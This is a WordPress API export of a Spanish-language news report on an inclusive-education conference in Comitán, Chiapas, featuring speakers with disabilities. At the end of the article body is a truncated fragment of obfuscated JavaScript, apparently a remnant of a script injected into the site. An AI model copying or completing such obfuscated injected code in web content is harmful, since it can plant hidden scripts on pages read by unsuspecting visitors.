{"id":16188,"date":"2024-06-19T00:43:53","date_gmt":"2024-06-19T00:43:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16188"},"modified":"2024-06-19T00:43:54","modified_gmt":"2024-06-19T00:43:54","slug":"realizan-ciclo-de-conferencias-de-educacion-inclusiva-2024","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16188","title":{"rendered":"Realizan Ciclo de Conferencias de Educaci\u00f3n Inclusiva 2024"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240618-WA0028-1024x768.jpg\" alt=\"\" class=\"wp-image-16189\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240618-WA0028-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240618-WA0028-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240618-WA0028-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240618-WA0028-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/IMG-20240618-WA0028.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>18 de junio del 2024. San Crist\u00f3bal de Las Casas. \u2013 La ciudad de Comit\u00e1n de Dom\u00ednguez se convirti\u00f3 en el escenario del primer ciclo de Conferencias de Educaci\u00f3n Inclusiva 2024, titulado &#8220;Si yo puedo t\u00fa puedes&#8221;. El evento, organizado por el CNT 7 y el Maestro Luis Enrique Flores, tuvo como invitada especial a Ana Victoria V\u00e1zquez Tapia, Reina de las Personas con Discapacidad 2024, quien represent\u00f3 con orgullo a San Crist\u00f3bal.<\/p>\n\n\n\n<p>Los organizadores informaron que la jornada fue un testimonio de inclusi\u00f3n y superaci\u00f3n de obst\u00e1culos internos, con Ana Victoria V\u00e1zquez Tapia inspirando a los asistentes con su historia de perseverancia y logros, destacando el esp\u00edritu de San Crist\u00f3bal de las Casas.<\/p>\n\n\n\n<p>Entre los panelistas se encontraba el Maestro Gerardo de Jes\u00fas Hern\u00e1ndez Morales, un comiteco con discapacidad visual que ha creado una gu\u00eda inclusiva para personas con este padecimiento. Adem\u00e1s, C\u00e9sar Andr\u00e9s Cruz Palacios, un joven de 17 a\u00f1os con discapacidad visual que ha sido diputado parlamentario y est\u00e1 trabajando en la primera constituci\u00f3n en braille en M\u00e9xico, comparti\u00f3 su impresionante trayectoria.<\/p>\n\n\n\n<p>Desde Tuxtla Guti\u00e9rrez, el Maestro Miguel \u00c1ngel Ramos Avenda\u00f1o relat\u00f3 su lucha contra el bullying y su compromiso con la erradicaci\u00f3n del acoso escolar, destacando la importancia de un entorno educativo seguro e inclusivo. El Dr. Juan Carlos Morales Ozuna, conferencista motivacional, enfatiz\u00f3 la importancia de superar los miedos para alcanzar el \u00e9xito, motivando a los presentes con su mensaje de resiliencia.<\/p>\n\n\n\n<p>Las historias compartidas durante el ciclo de conferencias fueron profundamente emotivas y subrayaron la necesidad de brindar igualdad de oportunidades a las personas con discapacidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 18 de junio del 2024. San Crist\u00f3bal de Las Casas. \u2013 La ciudad de Comit\u00e1n de Dom\u00ednguez se convirti\u00f3 en el escenario del primer ciclo de Conferencias de Educaci\u00f3n Inclusiva 2024, titulado &#8220;Si yo puedo t\u00fa puedes&#8221;. El evento, organizado por el CNT 7 y el Maestro Luis Enrique Flores, tuvo como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16189,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16188","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16188"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16188\/revisions"}],"predecessor-version":[{"id":16190,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16188\/revisions\/16190"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16189"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}